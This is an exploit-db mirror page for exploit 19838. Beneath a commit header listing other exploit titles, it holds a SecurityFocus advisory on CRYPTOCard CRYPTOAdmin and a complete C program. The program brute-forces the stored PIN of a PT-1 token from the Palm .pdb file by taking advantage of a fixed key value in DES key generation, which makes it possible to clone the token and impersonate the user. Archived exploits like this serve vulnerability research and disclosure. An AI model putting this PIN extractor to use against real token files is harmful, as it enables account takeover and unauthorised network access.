exploit-db-mirror/exploits/linux/local/19838.c
Offensive Security 880bbe402e DB: 2019-03-08
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

72 lines
No EOL
2.5 KiB
C

// source: https://www.securityfocus.com/bid/1097/info
CRYPTOCard CRYPTOAdmin is a network authentication application for use with the Palm OS platform. CRYPTOAdmin generates a .pdb file which contains the username, PIN number, serial number, and key in encrypted or plaintext format. The PIN number can be retrieved due to the software's usage of a fixed 4-byte value in key generation. With access to the .pdb file and PIN number, a user is capable of duplicating the token onto another Palm device effectively gaining access to the network as the compromised user.
#include<stdio.h>
#include<des.h>
int main(int argc, char **argv)
{
des_cblock in,out,key,valid = {0x63, 0x6A, 0x2A, 0x3F,
0x25, 0x6D, 0x67, 0x6C};
des_key_schedule sched;
unsigned long massaged;
FILE *pdb;
if (argc == 1)
{
fprintf(stdout, "\nUsage: %s <.PDB filename>\n\n", argv[0]);
return 1;
}
fprintf(stdout, "\nCRYPTOCard PT-1 PIN Extractor\n");
fprintf(stdout, "kingpin@atstake.com\n");
fprintf(stdout, "@Stake L0pht Research Labs\n");
fprintf(stdout, "http://www.atstake.com\n\n");
if((pdb = fopen(argv[1], "rb")) == NULL)
{
fprintf(stderr, "Missing input file %s.\n\n", argv[1]);
return 1;
}
fseek(pdb, 189L, SEEK_SET);
if (fread(in, 1, 8, pdb) != 8)
{
fprintf(stderr, "Error getting ciphertext string.\n\n");
return 1;
}
fclose(pdb);
key[4] = 0x24;
key[5] = 0x7E;
key[6] = 0x3E;
key[7] = 0x6C;
for (massaged = 0; massaged < 900000000; massaged += 9)
{
key[0]=(massaged>>24) & 0xff;
key[1]=(massaged>>16) & 0xff;
key[2]=(massaged>>8) & 0xff;
key[3]=(massaged) & 0xff;
des_set_key(&key,sched);
des_ecb_encrypt(&in,&out,sched,DES_DECRYPT);
if (memcmp(out, valid, 8) == 0)
{
fprintf(stdout, "\n\nPIN: %d", massaged/9);
break;
}
if ((massaged % 900000) == 0)
{
fprintf(stdout, "#");
fflush(stdout);
}
}
fprintf(stdout, "\n\n");
return 0;
}